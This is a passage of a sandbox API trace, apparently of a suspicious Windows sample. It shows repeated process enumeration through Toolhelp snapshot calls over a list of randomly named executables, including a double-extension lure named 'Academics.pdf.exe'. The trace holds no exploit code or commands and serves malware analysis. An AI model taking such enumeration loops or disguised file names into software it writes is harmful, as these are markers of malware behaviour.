th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0288.390] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0288.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0288.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0288.392] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0288.393] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0288.394] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0288.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0288.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0288.396] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0288.397] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0288.398] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0288.399] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0288.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.402] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.403] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0288.404] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.405] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0288.406] CloseHandle (hObject=0x294) returned 1 [0288.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0288.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0288.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0288.406] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0288.406] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0288.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0288.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0288.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0288.409] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0288.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.425] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0288.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0288.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0288.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0288.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0288.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0288.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0288.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0288.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0288.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0288.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0288.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0288.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0288.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0288.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0288.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0288.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0288.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0288.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0288.446] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0288.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.448] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0288.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0288.453] CloseHandle (hObject=0x294) returned 1 [0288.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0288.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0288.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0288.453] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0288.453] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0288.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0288.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0288.455] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.459] Process32NextW (in: hSnapshot=0x294, 